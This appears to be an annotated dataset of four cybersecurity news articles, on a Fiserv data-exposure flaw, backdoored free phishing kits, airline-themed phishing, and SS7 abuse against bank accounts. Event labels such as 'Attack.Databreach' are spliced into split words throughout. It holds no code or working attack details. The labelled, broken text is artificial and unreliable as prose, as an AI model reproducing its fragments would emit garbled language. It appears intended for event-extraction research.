affected customers banking with hundreds of financial institutions US-based financial services firm Fiserv h as just fixed Vulnerability-related.PatchVulnerabilitya flaw in its web platform that exposed the personal and financial details of a vast number of banking customers . With more than 12,000 clients across the world using the company 's services , it is hard to establish how many customers ' details w ere exposed Attack.Databreachin the 'information disclosure vulnerability ' f ound Vulnerability-related.DiscoverVulnerabilityby security researcher Kristian Erik Hermansen . When logging into his local bank , which uses Fiserv 's platform , Hermansen learned email alerts for financial transactions were assigned an 'event number ' , which he successfully predicted were distributed in sequence , according to KrebsOnSecurity . Using this knowledge , the researcher was able to directly view alerts set up by another customer by rewriting the site 's code in his browser and sending a request for an altered event number . He was able to view the customer 's email address , phone number and bank account number - as well as view and edit alerts they had previously set up . `` I should n't be able to see this data , '' he said . `` Anytime you spend money that should be a private transaction between you and your bank , not available for everyone else to see . '' He added a criminal could have exploited the flaw to s teal Attack.Databreachinformation from customers . Together with KrebsOnSeceurity author Brian Krebs , Hermansen worked to v erify Vulnerability-related.DiscoverVulnerabilitywhether or not the flaw was exclusive to his own bank 's installation of the platform . They soon d iscovered Vulnerability-related.DiscoverVulnerabilityhundreds of other Fiserv-affiliated banks may h ave been just as vulnerable Vulnerability-related.DiscoverVulnerabilityas those they had tested . IT Pro approached Fiserv for comment , and to establish how many institutions in the UK may have been affected , if any , but the company did not respond at the time of writing . A spokesperson told Krebs that Fiserv had responded accordingly , and c orrected Vulnerability-related.PatchVulnerabilitythe issue . `` After receiving your email , we promptly engaged appropriate resources and worked around the clock to research and remediate the situation , '' the spokesperson said . `` We d eveloped Vulnerability-related.PatchVulnerabilitya security patch within 24 hours of receiving notification and d eployed Vulnerability-related.PatchVulnerabilitythe patch to clients that utilise a hosted version of the solution . We w ill be deploying Vulnerability-related.PatchVulnerabilitythe patch this evening to clients that utilise an in-house version of the solution . '' While information disclosure vulnerabilities are among the most common types of website security issues , according to Krebs , they are also the most preventable and easy to f ix.Vulnerability-related.PatchVulnerabilityBut they can also cause just as much damage to a company 's brand as more severe security risks .
It seems the old warning 'you get what you pay for ' can just as easily be applied to items purchased on underground forums and the dark web as it can to anything you buy elsewhere , because unbeknown to those experimenting with free phishing kits , they 're secretly b eing phished Attack.Phishingthemselves . An analysis of over one thousand phishing kits designed to allow wannabe cybercriminals to b uild Attack.Phishingphishing emails and websites found that , in a significant proportion of cases , the trainee phishers a re being compromised,Attack.Databreachwith their stolen data being secretly sent to the kit authors . With p hishing Attack.Phishingsimple to carry out but potentially very financially rewarding -- some of the highest profile cyber-attacks of recent years began with a phishing email -- it 's no wonder that newbie hackers want in . But their lack of skill is coming back to bite some of these aspiring cybercriminals , who might find that all their ill-gotten gains are also transferred to the original author of the kit . Researchers at Imperva analysed 1,019 readily-available phishing kits , finding underground markets filled with low-cost and free phishing kits advertised as means of providing aspiring cyber-attackers with a route into the illegal industry . `` Underground markets are full of phishing kits at all levels and cost , some even distributed at no charge , usually revealing one of the oldest rules in the book -- you get what you pay for , '' said Luda Lazar , security research engineer at Imperva . `` Here we found the only free cheese is in the mousetrap , '' she added . While these phishing kits did provide aspiring attackers with the files necessary to c reate Attack.Phishinga copy of target websites and s teal Attack.Databreachvaluable information , many of these free offerings contain an undisclosed backdoor . That means the kit author is able to secretly t rack Attack.Databreachthe campaigns of the crooks using the software and g ain access Attack.Databreachto the stolen information themselves . In doing so , they 're able exploit the likes of stolen usernames , passwords , and credit card details without putting in the effort required to c ollect Attack.Databreachthem . As a result , the phishing kit user ca n't reap much from their criminal gains , as in many cases , victims will change passwords or cancel credit cards if they realise they 've been targeted . `` About 25 percent of the kits contained implicit recipients which r eceive Attack.Phishingemails with t he phishing Attack.Phishingresults as well as the kit buyers who were intended to receive it . We assume that the hidden addresses belong to the kits ' authors , which are actually s tealing Attack.Databreachfrom the inexperienced phishers who deploy these kits , '' said Lazar . Ultimately , by offering these phishing kits for free , it provides those behind them with the largest possible pool of victims to exploit -- and it 's not as if a hacker can complain to the authorities that they 've been scammed .
malware -- and they 're even m imicking Attack.Phishinginternal corporate travel and expenses systems to steal personal details from the victims they target . While cybercriminals using the lure of fake travel itineraries to d upe Attack.Phishingstaff working in sectors reliant on shipping goods or employee travel is n't new , researchers have uncovered a particularly advanced p hishing attack.Attack.PhishingDiscovered by cybersecurity researchers at Barracuda Networks , this airline p hishing attack Attack.Phishinguses a variety of techniques to capture sensitive data from victims and deploy an advanced persistent threat . The email from the attacker i mpersonates Attack.Phishinga travel agency or an employee in the target 's own HR or finance department . The email 's subject line c laims Attack.Phishingit 's a forwarded message about a flight confirmation , stating the airline , the destination , and the price of the flight . All three of these elements are carefully researched by the attackers , who select them specifically according to the target , in order to make the email look legitimate in context of the company and the email recipient . Taking the time to t ailor Attack.Phishingphishing emails in this way works : these messages are opened 90 percent of the time , one of the highest success rates for p hishing attacks,Attack.Phishingaccording to Barracuda . Once opened , the email presents the target with an attachment in the form of a PDF or Microsoft Word document . The attachment p urports to be Attack.Phishinga flight confirmation or receipt but , of course , it 's neither of these things . When the target opens the attachment , the malware runs immediately , dropping an advanced persistent threat into the network , and enabling the attacker to stealthily monitor the infected organisation -- likely with the aim conducting espionage and s tealing Attack.Databreachdata . Another variant of t his attack Attack.Phishingwhich , instead of dropping malware to stealthily steal data , uses phishing links to directly take sensitive information from the victim . These phishing links are ultimately designed to t rick Attack.Phishingthe victim into supplying sensitive corporate credentials , which the attackers will then use to infiltrate the company network , databases , and emails in order to s teal Attack.Databreachinformation . Cybersecurity researchers warn that the combined use of impersonation , malware , and p hishing Attack.Phishingis particularly dangerous because these methods complement one another , enabling the attacker to essentially gain control of the network . At this stage , the attackers can stealthily conduct espionage or even drop additional malware and ransomware . Sometimes it can be very difficult to identify a phishing email , but the likes of sandboxing and advanced persistent threat prevention combined with employee training and awareness can increase the chances of preventing attacks from compromising the network
For years , researchers , hackers , and even some politicians h ave warned Vulnerability-related.DiscoverVulnerabilityabout stark vulnerabilities in a mobile data network called SS7 . These flaws allow attackers to listen to calls , i ntercept Attack.Databreachtext messages , and pinpoint a device 's location armed with just the target 's phone number . Taking advantage of these issues has typically been reserved for governments or surveillance contractors . But on Wednesday , German newspaper The Süddeutsche Zeitung reported that financially-motivated hackers had used those flaws to help d rain Attack.Databreachbank accounts . This is much bigger than a series of bank accounts though : it cements the fact that the SS7 network poses a threat to all of us , the general public . And it shows that companies and services across the world urgently need to move away from SMS-based authentication to protect customer accounts . `` I 'm not surprised that hackers take money that is 'lying on the table ' . I 'm just surprised that online bank thieves took so long in joining spying contractors in abusing the global SS7 network , '' Karsten Nohl , a cybersecurity researcher who h as highlighted Vulnerability-related.DiscoverVulnerabilityvulnerabilities in SS7 , told Motherboard in an email . In short , the issue with SS7 is that the network believes whatever you tell it . SS7 is especially used for data-roaming : when a phone user goes outside their own provider 's coverage , messages still need to get routed to them . But anyone with SS7 access , which can be purchased for around 1000 Euros according to The Süddeutsche Zeitung , can send a routing request , and the network may not authenticate where the message is coming from . That allows the attacker to direct a target 's text messages to another device , and , in the case of the bank accounts , s teal Attack.Databreachany codes needed to login or greenlight money transfers ( after the hackers o btained Attack.Databreachvictim passwords ) . Although some telcos have taken steps to m itigate Vulnerability-related.PatchVulnerabilitythe issue , there are clearly still huge gaps for hackers to exploit . `` Everyone 's accounts protected by text-based two-factor authentication , such as bank accounts , are potentially at risk until the FCC and telecom industry f ix Vulnerability-related.PatchVulnerabilitythe devastating SS7 security flaw , '' Lieu said in a statement published Wednesday . `` I urge the Republican-controlled Congress to hold immediate hearings on this issue . '' In the meantime , and maybe irrespective of whether SS7 problems are ever f ixed,Vulnerability-related.PatchVulnerabilitysocial media companies , banks , and other online services need to stop using SMS-based two-factor authentication . Last year the National Institute of Standards and Technology said it was no longer recommending solutions that used SMS . Twitter does let users sign in with a code from Google Authenticator , an app on your smartphone that provides a more robust form of two-factor authentication , but the site apparently still sends those logging in an SMS code , which , in light of these recent SS7 attacks , totally undermines the extra security protections . Twitter did not immediately respond to a request for comment . Motherboard even recently published a piece telling general readers that they were likely fine with only SMS-based two-factor authentication , which focused on another type of attack and was based on the premise that non-state hackers were not widely using SS7 . That piece , clearly , is out of date . `` It is unacceptable the FCC and telecom industry have not acted sooner to protect our privacy and financial security , '' Lieu 's statement added .